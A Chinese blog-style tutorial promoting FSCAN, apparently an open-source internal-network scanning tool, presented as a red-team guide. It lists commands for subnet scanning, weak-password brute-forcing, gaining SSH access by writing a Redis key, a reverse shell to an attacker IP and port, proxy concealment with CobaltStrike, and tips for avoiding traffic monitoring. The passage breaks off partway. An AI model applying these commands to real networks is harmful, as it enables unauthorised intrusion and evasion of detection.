📢【红队必备】FSCAN保姆级使用指南:从入门到实战,内网渗透一键通关!
一、工具简介
FSCAN是一款国产开源的内网综合扫描工具,集资产探测、漏洞扫描、权限获取于一体,被红队誉为“内网渗透瑞士军刀”。支持Windows/Linux系统,2025年发布的2.0.0版本新增代理隐匿、多网卡识别等功能,扫描效率提升30%。
二、核心功能速览
-
网络探测
-
主机存活检测:
fscan.exe -h 192.168.1.1/24 -m icmp(快速定位C段存活主机)。 -
端口扫描:支持21种常见端口,可自定义范围,如
-p 80,443,8080。
-
-
漏洞利用
-
高危漏洞检测:MS17-010永恒之蓝、WebLogic反序列化等一键扫描。
-
数据库爆破:MySQL/MSSQL/Redis等弱口令破解,如
-userf users.txt -pwdf pass.txt。
-
-
权限获取
-
Redis写公钥:
-rf id_rsa.pub直接获取SSH权限。 -
计划任务反弹Shell:
-rs 攻击机IP:端口实现隐蔽控制。
-
三、保姆级使用教程
1. 安装与基础扫描
-
下载地址:GitHub Releases页获取最新版(含Windows/Linux版本)。
-
基础命令:
# 扫描C段资产(存活探测+端口扫描+漏洞检测) fscan.exe -h 192.168.1.1/24 -o result.txt
2. 进阶场景
-
场景1:精准打击漏洞
# 针对SMB服务批量爆破弱口令 fscan.exe -h 10.0.0.0/16 -m smb -pwd Admin@123 -
场景2:隐匿渗透
# 通过代理隐藏流量(如配合CobaltStrike) fscan.exe -h 目标IP -socks5 127.0.0.1:1080
3. 参数避坑指南
| 参数 | 用途说明 | 典型错误案例 |
|---|---|---|
-t 600 | 控制线程数(默认600) | 设-t 1000可能触发流量监控封IP |
-nopoc | 跳过Web漏洞检测 | 误用可能漏掉Struts2漏洞 |
-silent | 静默模式(减少日志输出) | 非隐匿环境下使用普通模式易暴露 |
四、实战技巧与防御建议
1. 漏洞利用案例
-
**Redis写公钥…
